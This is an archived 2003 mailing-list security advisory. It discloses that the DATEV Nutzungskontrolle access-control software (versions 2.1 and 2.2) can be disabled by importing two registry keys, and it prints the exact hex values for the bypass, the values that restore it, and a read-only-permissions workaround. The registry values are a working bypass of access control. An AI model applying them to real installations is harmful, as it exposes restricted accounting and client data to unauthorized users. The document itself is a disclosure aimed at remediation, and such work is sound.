| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: t4rku5 at hushmail.com (t4rku5@...hmail.com) Subject: DATEV Nutzungskontrolle Bypassing (REG) Topic: DATEV Nutzungskontrolle Bypassing Release Date: 2003-10-30 Affected system: ================ - Nutzungskontrolle V.2.2 - Nutzungskontrolle V.2.1 Unaffected system: ================== - none known Summary: ======== DATEV eG is a German Company, which makes Software for tax advisors and lawyers. The Nutzungskontrolle (NUKO) is a Software to restrict the access for the users. For example, a normal user is not allowed to see the internal reward accounting data. These data are restrictet by the NUKO by, for example, blocking the "advisor number", which is used for all data in the internal reward accounting. Issue: ====== It is possible to deactivate the NUKO with just importing 2 registry keys: [HKEY_LOCAL_MACHINE\SOFTWARE\DATEV] "NukoInfo"=hex:00,00,00,00,00,00,00,00,e4,6c,d9,ce,f1,69,97,e7,61,eb, 08,48,e7,\ 71,65,9b [HKEY_LOCAL_MACHINE\SOFTWARE\DATEVeG\Components\B0000046\Versions\1.0\NukoInfos] "NukoInfo"=hex:00,00,00,00,00,00,00,00,e4,6c,d9,ce,f1,69,97,e7,61,eb, 08,48,e7,\ 71,65,9b If these 2 keys are importet, the NUKO is deactivated for the complete machine. So it is possible to see all data which are normaly restricted by the NUKO. The first 8 hex positions are freely choosable and dont have to be the same as in the second key. The next 16 positons have to be exactly as in the example. To activate the NUKO just import the following keys: [HKEY_LOCAL_MACHINE\SOFTWARE\DATEV] "NukoInfo"=hex:00,00,00,00,00,00,00,00,ee,37,8f,26,b2,e2,e6,ed,b7,ee, c0,1d,f4,\ 84,62,c4 [HKEY_LOCAL_MACHINE\SOFTWARE\DATEVeG\Components\B0000046\Versions\1.0\NukoInfos] "NukoInfo"=hex:00,00,00,00,00,00,00,00,ee,37,8f,26,b2,e2,e6,ed,b7,ee, c0,1d,f4,\ 84,62,c4 Workaround: =========== Give normal users "read only" access to this Registry keys. Credits: ======== Discovered by t4rku5 Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434 Promote security and make money with the Hushmail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists